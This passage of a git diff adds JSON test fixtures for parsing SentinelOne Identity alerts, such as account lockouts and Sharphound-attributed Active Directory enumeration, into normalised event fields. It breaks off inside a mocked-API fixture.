+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "ba485919-e4c1-4496-9e2f-feb320f6841a",
+        "name": "Domain Controller Discovery Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_10.json b/SentinelOne/identity/tests/test_alert_10.json
new file mode 100644
index 000000000..deb56e2a5
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_10.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T09:09:48.731000Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+      "start": "2024-11-22T09:09:48.731000Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T09:09:48.731000Z",
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "UNKNOWN",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935322-7b49-71f0-89e0-f52562c26e53",
+        "name": "Brute force attack - Mass Account Lockout",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json
new file mode 100644
index 000000000..a4d81025f
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_11.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:51Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.",
+      "start": "2024-11-22T08:45:51Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T08:45:51Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-d00e-7616-81b9-fcb227ebb13d",
+        "name": "Domain Controller Discovery Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json
new file mode 100644
index 000000000..1618da843
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_12.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:51Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.",
+      "start": "2024-11-22T08:45:51Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T08:45:51Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-eb28-7a57-9c27-87843b2cec61",
+        "name": "AD Service Account Enumeration Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json
new file mode 100644
index 000000000..a31ef954f
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_13.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:50Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.",
+      "start": "2024-11-22T08:45:50Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T08:45:50Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-c715-72c9-bbd9-dc1ff6a7ff1e",
+        "name": "AD Domain Computer Enumeration Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json
new file mode 100644
index 000000000..7b9fc10e1
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_14.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:50Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is generated when a command used to query or read the ACL's\\ Permission of any object in Active Directory.",
+      "start": "2024-11-22T08:45:50Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T08:45:50Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-cb9b-770e-96ee-632d4d21520b",
+        "name": "AD ACL Enumeration",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json
new file mode 100644
index 000000000..d8a7c1f8a
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_15.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:50Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.",
+      "start": "2024-11-22T08:45:50Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T08:45:50Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-d4ba-7131-9e08-defa8b3aeb52",
+        "name": "Domain Users Enumeration Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
new file mode 100644
index 000000000..8a5217a55
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_16.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
+  },
+  "expected": {
+    "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
+    "event": {
+      "category": "intrusion_detection",
+      "end": "2024-11-22T08:45:50Z",
+      "kind": "alert",
+      "provider": "Identity",
+      "reason": "This events is raised when a LDAP search Query is detected from the endpoint.",
+      "start": "2024-11-22T08:45:50Z",
+      "type": "info"
+    },
+    "@timestamp": "2024-11-22T08:45:50Z",
+    "file": {
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe",
+      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
+    },
+    "observer": {
+      "product": "Singularity Identity",
+      "vendor": "SentinelOne"
+    },
+    "process": {
+      "command_line": "Sharphound.exe"
+    },
+    "related": {
+      "hash": [
+        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      ]
+    },
+    "sentinelone": {
+      "identity": {
+        "attackSurfaces": [
+          "IDENTITY"
+        ],
+        "classification": "ENUMERATION",
+        "confidenceLevel": "MALICIOUS",
+        "id": "01935310-dc47-75de-8925-5f026bd5a705",
+        "name": "LDAP Search Detected",
+        "status": "NEW"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json
new file mode 100644
index 000000000..6d697a5be
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_2.json
@@ -0,0 +1,22 @@
+{
+  "input": {
+    "message": "{\n  \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n  \"lastMigration\": 33,\n  \"name\": \"Mocked api\",\n  \"endpointPrefix\": \"\",\n  \"latency\": 0,\n  \"port\": 3000,\n  \"hostname\": \"\",\n  \"folders\": [\n    {\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n      \"name\": \"user\",\n      \"children\": [\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n        }\n      ]\n    }\n  ],\n  \"routes\": [\n    {\n      \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n      \"type\": \"http\",\n      \"documentation\": \"Creates new user\",\n      \"method\": \"post\",\n      \"endpoint\": \"user\",\n      \"responses\": [\n        {\n          \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"w34k\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"CreateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n      \"type\": \"http\",\n      \"documentation\": \"Logout\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/logout\",\n      \"responses\": [\n        {\n          \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n      \"type\": \"http\",\n      \"documentation\": \"Authenticate user with credentials\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/authenticate\",\n      \"responses\": [\n        {\n          \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"AuthenticateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n      \"type\": \"http\",\n      \"documentation\": \"Refresh Session\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/refresh-session\",\n      \"responses\": [\n        {\n          \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": true,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          